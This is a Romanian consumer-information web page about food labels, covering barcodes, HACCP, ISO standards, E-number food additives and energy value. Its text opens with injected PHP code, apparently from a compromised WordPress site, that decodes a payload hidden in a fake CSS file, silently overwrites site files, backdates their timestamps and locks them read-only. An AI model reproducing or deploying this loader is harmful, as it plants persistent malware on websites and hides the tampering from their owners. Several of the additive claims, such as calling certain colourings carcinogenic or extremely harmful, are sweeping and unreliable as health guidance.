$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } ATUNCI SĂ DESCIFRĂM TAINELE ETICHETELOR – O noua atitudine

Ştii ce ar trebui să conţină o etichetă?
Citeşti etichetele produselor?
Conţin acestea informaţii importante
pentru sănătatea ta?
Ştii ce este valoarea energetică?
Ce înseamnă HACCP?
Dar ISO?

Ce este codul de bare?
Ai auzit des aceste cuvinte, dar ştii ce reprezintă?
Într-un mediu economic concurenţial, sistemele informatice computerizate devin din ce în ce mai importante în eficientizarea afacerii dvs.
Pentru atingerea acestei eficienţe este esenţial ca informaţiile introduse în calculator să fie corecte şi cu costuri cât mai reduse. Aceste cerinţe sunt asigurate prin folosirea codurilor de bare. Astfel, informaţiile din calculator sunt trecute în cod de bare cu ajutorul unei imprimante de tipărire cod de
bare pe etichete autocolante, etichete ce sunt citite de un scaner şi procesate de calculator fără riscul erorii umane.

Avantajul folosirii sistemului cod de bare
– cumpărătorul beneficiază de o procedură rapidă la casa de marcat,
– pe eticheta tiparită cu cod de bare apare denumirea produsului şi preţul,
– minimizează riscul erorii umane de a tasta un podus şi a elibera alt produs.

Pe scurt, un control mai bun, un timp de acţiune redus şi o profitabilitate crescută.

Atenţie! Toate informaţiile privitoare la produsele şi serviciile oferite consumatorilor, documentele însoţitoare, precum şi contractele preformulate, trebuie să fie scrise în limba română, indiferent de ţara de origine a acestora,
fără a exclude prezentarea acestora şi în alte limbi.

Importanţa şi rolul informaţiilor conţinute de eticheta
unui produs alimentar constau în:
– îmbunătăţirea posibilităţilor de alegere a unui produs de către consumatori şi influenţarea acestor alegeri printr-o deplină cunoaştere a informaţiilor referitoare la produs;

– informarea corectă, în special a categoriilor de consumatori care suferă de alergii sau reacţii adverse la anumite substanţe;

– posibilitatea alegerii unor produse alimentare în vederea realizării unei diete sănătoase şi care să corespundă dorinţei consumatorilor;

– creşterea încrederii consumatorilor în produs prin corectitudinea şi cantitatea informaţiilor transferate prin intermediul etichetei;

–    încurajarea producătorilor de produse alimentare în vederea transmiterii de informaţii suplimentare, faţă de cele impuse de legislaţie, pentru a fi trecute pe eticheta produselor pentru a satisface dorinţa de informare a consumatorilor.

Ce reprezintă H.A.C.C.P.?
Hazard Analzsis Critical Control Point
(Analiza Riscurilor. Puncte Critice de Control)
–    este un sistem de management al siguranţei alimentelor.

Avantaje:
– mai mare siguranţă a produsului şi riscuri scăzute la garantarea produsului.
– îmbunătăţirea semnificativă a comunicării şi creşterea nivelului de încredere între clienţi, furnizori şi autorităţile de supraveghere.
– prevenirea problemelor care pot să apară referitoare la garantarea produselor.
– ajută firmele din industria alimentară să devină competitive pe piaţa internaţională.
– diminuează barierele comerţului internaţional.
– clienţii consumă produse mai sigure.

Dacă observaţi pe etichete siglele ISO 9001 sau HACCP puteţi avea certitudinea că respectivele produse sunt sigure. Standardele ISO 9001, ISO 9004 promovează adoptarea unei abordări din perspectiva proceselor desfăşurate în organizaţie pentru dezvoltarea, implementarea şi îmbunătăţirea eficacităţii Sistemului de Management al Calităţii cu scopul creşterii satisfacţiei clienţilor.

Calorie – unitate de măsură care indică energia furnizată
organismului de un aliment.

Ce sunt E-urile? Sunt periculoase pentru sănătatea ta?
Aditivii alimentari sunt substanţe chimice adăugate în alimente sau băuturi cu scopul de a le ”ameliora” diverse proprietăţi: gustul, culoarea, stabilitatea, rezistenţa la alterare. În mod standardizat, denumirea lor este formată
din litera”E” şi un indice compus din trei cifre. Aditivii alimentari sunt împărţiţi în 24 de categorii, dintre care enumerăm pe cele mai răspândite:
–  îndulcitori = înlocuiesc zahărul,
–  coloranţi = pentru a da o culoare mai apetisantă,
–  acidifianţi = dau un gust uşor acid,
–  corectori de aciditate = cresc sau diminuează aciditatea,
–  emulsificatori = asigură un amestec omogen între apă şi
grăsimile alimentare,
–  conservanţi = întârzie sau împiedică alterarea alimentelor,
–  corectori de gust şi miros = îmbunătăţesc mirosul şi gustul
alimentelor,
–  propulsori = care servesc la expulzarea gazelor din
alimentele ambalate,
–  antioxidanţi = limitează oxidarea alimentelor sensibile la
contactul cu aerul.

Suspecte – E150, E171, E172, E173, E141 – coloranţi,
E477 – emulsificatori.
Periculoase – E102 sau tartrazina (colorant galben)
extrem de nociv, se găseşte în băuturi, muştar şi gem,
poate genera tumori tiroidiene sau crize de astm bronşic,
E110 sau Sunset yellow (colorant galben) – cancerigen,
se găseşte în dulciuri, prăjituri, budinci, diverse sucuri,
E120 (colorant) provoacă alergii, E124 sau Ponceau 4R
(colorant roşu) – toxic interzis în SUA, produce tumori
pe glanda tiroidă şi se găseşte în mezeluri.
Toxice – E220, E221, E222, E224 (sulfiţi – conservanţi)
produc boli intestinale şi alergii, se găsesc în carnea de
hamburgări, cartofi, deshidrataţi, fructe confiate,
prăjituri, bere, oţet de vin.
ATENŢIE! NU TOATE E-URILE SUNT PERICULOASE!

Acestea sunt informaţiile care trebuie să fie prezente
OBLIGATORIU pe etichetă: denumirea produsului, data
fabricaţiei, greutatea netă, informaţii nutriţionale,
informaţii de utilizare, lista ingredientelor, date referitoare
la producător.
În plus, trebuie să fie menţionate avertismente legate de
prezenţa anumitor ingrediente ce pot provoca alergii
alimentare, cum ar fi: alunele, crustaceele, ouăle, nucile
etc.)
În conformitate cu noua legislaţie producătorii sunt obligaţi
să menţioneze pe ambalajul produselor valoarea energetică
a acestora.

Ce este valoarea energetică?
Valoare energetică se determină prin cantitatea de energie
ce se degajă din substanţele nutritive ale produsului
(proteine, glucide, grăsimi-lipide).
Proteina – este un element esenţial al fiinţelor vii, deoarece
formează structura de bază a tuturor celulelor.
Lipsa (carenţa) de proteine în organism poate produce:
– tulburări de creştere şi de nutriţie,
– scăderea rezistenţei la infecţii.
Glucidele – sunt substanţe organice naturale, care constituie
componente fundamentale ale materiei vii, având un rol
important în metabolism. Rolul glucidelor este deosebit de
mare pentru sistemul nervos central.
Cu ajutorul lipidelor – se poate obţine, în alimentaţie,
valoare energetică mare în volum mic de alimente. Lipsa
totală şi prelungită a grăsimilor produce tulburări grave:
oprirea în creştere, modificarea pielii, a mucoaselor, a
părului, a unghiilor.

By o9admin